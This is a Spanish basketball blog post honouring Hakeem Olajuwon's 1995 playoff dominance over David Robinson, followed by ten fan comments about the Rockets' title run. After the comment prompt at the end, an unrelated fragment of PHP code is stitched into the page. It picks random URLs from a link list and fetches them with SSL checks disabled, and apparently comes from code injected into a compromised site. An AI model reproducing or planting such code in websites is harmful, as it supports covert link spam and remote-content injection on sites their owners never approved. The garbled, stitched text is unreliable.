Hakeem “The Dream” Olajuwon

09 de April de 2008 por txusma

El pasado lunes Hakeem Olajuwon fue elegido como nuevo miembro del Hall of Fame dentro de la promoción 2008. Como homenaje os presentamos un vídeo que explica como “The Dream” destrozó literalmente a David Robinson (MVP de aquella temporada) en la final del Oeste de los Playoffs de 1995. Días después se haría con su segundo anillo consecutivo.

Olajuwon, a los 32 años, promedió 35.3 puntos, 12.5 rebotes, 5 asistencias, 1.3 robos y 4.2 tapones y dejó muestras de su infinita calidad y un repertorio de movimientos que deberían ser de obligada visualización para los pívots de hoy en día.

Comenta

10 comentarios a esta entrada

  1. ToNHo-85 dice:
    #1

    Vaya tela, lo que me he perdido. Que partidos me recomendariais aparte de este, para bajarme y disfrutar de este crack?

      Citar

  2. TheDeerHunter dice:
    #2

    Pues, cualquiera de los partidos de playoffs del 94 y 95… en especial los cruces contra SA y las finales, primero contra los Nicks que fueron la bomba y después contra Orlando de Shaq y Penny H. (primero la final de los Nicks por calidad, me refiero) El segundo título lo recuerdo mucho más emocionante que el primero… porque estaban clasificados muy bajo para los play-offs.
    Impresionantes también alguno de los All-Star de esos años. El primero de Shaq, en el que todos los pívots del oeste se mentalizaron para darle una lección histórica. El del MVP del all-star de Olajuwon tb, por supuesto.

    PD: Esta es una de las razones por la que jamás me gustó Robinson. Demasiado exterior para considerarlo un pívot de leyenda.
    MVP-MVP!!! a olajuwon ese año le faltó meterle las estatuilla por el… todo lo demás se lo hizo.

      Citar

  3. Gallis dice:
    #3

    En el segundo anillo, en el 95, acabaron la regular season octavos y ganaron el anillo eliminando, siempre con el factor cancha en contra, a Utah, Phoenix, San Antonio y Orlando. Tela…

    fue cuando Tomjanocich dijo aquello de: “Nunca subestimes el corazón de un campeón”

    Que bueno era, por dios de mi vida…

      Citar

  4. Gallis dice:
    #4

    Por cierto…que jovencito que estaba Horrycrack por aquel entonces, jeje…

      Citar

  5. Olafur dice:
    #5

    Tremendo con 208 cmts que manera de bailar nunca mejor dicho a los pivots rivales, sin duda el mejor pivot que he visto, y su defensa de otra galaxia tmb

      Citar

  6. TheDeerHunter dice:
    #6

    Por calidad de movimientos, seguramente el mejor… sin duda.
    Yo el mejor pívot puro que he visto, sin duda Shaq…. y en global Kareem.

    Shaq sí se enfrentó a Olajuwon y se vió dónde flaqueaba el “Dream” (a pesar de que Olajuwon le ganó una final)
    Entre Olajuwon y Abdul-Jabbar podríamos discutir muchas cosas, pero por los criterios de comparación que disponemos no habría color.

      Citar

  7. ToNHo-85 dice:
    #7

    Lo de que quedaron octavos es verda? yo tenia entendido que los únicos que eliminaron en playoffs siendo 8ºs a los primeros fueron los Warriors este año y los Nuggets de Mutombo. Aunque quizás esto fue antes de que todas las rondas se jugaran a 7 partidos…

      Citar

  8. TheDeerHunter dice:
    #8

    En efecto, por aquel entonces la primera ronda era a 5.

    A mí me molaba mucho más aquel sistema, por cierto…

      Citar

  9. Gallis dice:
    #9

    Si Tonho, por aquel entonces, la primera ronda era a 5 partidos…

    Y coincido con Deer, a mi también me gustaba más así…

      Citar

  10. Elio dice:
    #10

    Recuerdo esa temporada como si hubiera acabado ayer.

    – Los Rockets terminaron con 47-35, SEXTOS del Oeste.

    – Eliminaron en el quinto partido de primera ronda a Utah en Utah.

    – Eliminaron a Phoenix en el séptimo partido de segunda ronda a Phoenix en Phoenix (con triple brutal de Mario Elie).

    – Eliminaron a San Antonio en el sexto partido siendo los Spurs el equipo con mejor record de la NBA.

    Barrieron a Orlando en las finales 4-0 pero ese es tal vez un resultado tal vez engañoso. Los Magic en el primer partido llegaron a ir ganando de 20 puntos tras el descanso. Todo parecía sentenciado pero Kenny Smith anotó 5 ó 6 triples (no recuerdo bien, fue record por aquel entonces) en el último cuarto y remontaron. Orlando tuvo la oportunidad de ganar el partido en los tiros libres pero Nick Anderson (un buen tirador con buenos porcentajes) falló CUATRO TIROS LIBRES CONSECUTIVOS y el partido se fue a la prorroga y los Rockets se hicieron con la victoria.

    A partir de ahí nada fue igual, los Magic no se recuperaron de ese mazazo psicológico (recordemos que eran un equipo extremadamente joven sin experiencia -salvo Horace Grant- y con un entrenador bastante malo) y fue un paseo militar para Houston. En el último partido incluso Olajuwon intentó un triple y lo clavó, estaba en estado de gracia.

    En cambio Nick Anderson realizó una serie catastrófica, totalmente atenazado por sus fallos del primer partido. De hecho no se volvió a recuperar y se convirtió en un pésimo lanzador de tiros libres y muy débil mentalmente, su carrera cayó en picado desde ese momento.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>